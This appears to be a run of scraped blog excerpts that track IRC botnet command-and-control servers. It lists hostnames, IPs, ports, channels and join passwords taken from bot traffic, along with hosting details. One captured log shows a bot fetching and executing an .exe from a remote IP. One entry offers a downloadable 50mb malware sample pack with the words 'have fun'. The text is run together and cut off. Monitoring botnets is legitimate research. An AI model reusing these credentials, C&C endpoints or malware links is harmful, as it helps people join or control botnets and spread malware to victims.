Remote Host Port Number jky.no-ip.info 3177 RAT here main.xxxxxiseviumixxxxx.info 3211 IRCD here NICK Sapphire{USA|XP-SP2}0300311 USER 03003114 “” “03003114” :03003114 MODE Sapphire{USA|XP-SP2}0300311 JOIN #Sapphire_2# NICK New{USA|XP-SP2}1046453 USER 10464537 “” “10464537” :10464537 MODE New{USA|XP-SP2}1046453 hosting infos: http://whois.domaintools.com/88.198.219.113
95.173.179.231(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)
Remote Host Port Number 95.173.179.231 6667 PASS codr00t MODE [USA|XP|094124] -ix JOIN #k codr00t PRIVMSG #k :[p2p]: Spreading to p2p folders. PONG HTTP1.4 NICK [USA|XP|094124] USER xfgbxix * 0 :COMPUTERNAME hosting infos: http://whois.domaintools.com/95.173.179.231
01.cybernix.info(irc botnet hosted in United States Willowbrook Psinet Inc)
Remote Host Port Number 01.cybernix.info 1750 PASS gsaxx00 NICK 0USA9j6m6dbn0n USER XP-SP2 x x :COMPUTERNAME JOIN ##pool P00L NICK 0USAiky784di69 hosting infos: http://whois.domaintools.com/154.35.64.32
46.243.8.119(irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number ircserver.taylor412gang.com 3941 NICK N[USA|XP][qhfpagj] USER qhfp “” “lol” :qhfp JOIN #apple apple57 hosting infos: http://whois.domaintools.com/46.243.8.119
ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)
Remote Host Port Number 209.200.50.75 3800 PASS hax0r 213.251.170.52 80 91.200.241.40 80 * The data identified by the following URLs was then requested from the remote web server: o http://api.wipmania.com/ o http://91.200.241.40/dq.exe PRIVMSG #dpi :[d=”http://91.200.241.40/dq.exe” s=”23552 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 PASS hax0r..KCIK 00000010 | 206E 7B55 537C 5850Read more...
homelessman.weedns.com(Mouse’s botnet hosted in the whole world lol)
this is prob one of the bigest botnets still alive from years now dns:homelessman.weedns.com port:3305 Resolved : [homelessman.weedns.com] To [80.247.72.130] Resolved : [homelessman.weedns.com] To [92.62.231.115] Resolved : [homelessman.weedns.com] To [202.117.53.21] Resolved : [homelessman.weedns.com] To [156.26.121.177] DNS List: ns.yumetairiku.co.jp:3305 virtual-mgsf.nebula.fi:3305 dell.aurius.sk:3305 cx10man.weedns.com:3305 fx010413.whyI.org:3305 gynoman.weedns.com:3305 c010x1.co.cc:3305 commgr.co.cc:3305 g.0x20.biz:3305 telephone.dd.blueline.be:3305 cx10man.weedns.com:3305 gynoman.weedns.com:3305 www.carpet-backing.com www.comofil.it www.iris-spa.it www.osteriadeltorchio.it ballslessman.weedns.com:3305 fx010413.whyi.org:3305Read more...
toxfeenyxx.sdeirc.net(phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)
Remote Host Port Number toxfeenyxx.sdeirc.net 3674 NICK N[USA|XP][tjxcvay] USER tjxc “” “lol” :tjxc JOIN #phoenix selling9309239 NICK N[USA|XP][baersyl] USER baer “” “lol” :baer hosting infos: http://whois.domaintools.com/46.243.8.142
50mb malware samples
This is another package with diferent malwares have fun size=50mb Download: http://c65cdb0b.tubeviral.com
75.102.22.40(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 195.122.131.8 80 204.0.5.41 80 63.135.80.224 80 63.135.80.46 80 66.220.158.11 80 75.102.22.40 2866 PASS xxx NICK NEW-[USA|00|P|20798] USER XP-0727 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|20798] -ix JOIN #!nine! test PONG 22 MOTD hosting infos: http://whois.domaintools.com/75.102.22.40
infected34.co.cc(irc botnet hosted in Germany Berlin Fast It Colocation)
ircd :infected34.co.cc:6667 PASS timu or PASS aliss NICK [00|USA|989169] USER XP-6593 * 0 :COMPUTERNAME MODE [00|USA|989169] -ix JOIN #N timu MODE [SI|USA|00|P|79102] -ix JOIN #test# aliss PONG 217.79.190.39 NICK [SI|USA|00|P|79102] USER XP-4584 * 0 :COMPUTERNAME hosting infos: http://whois.domaintools.com/217.79.190.39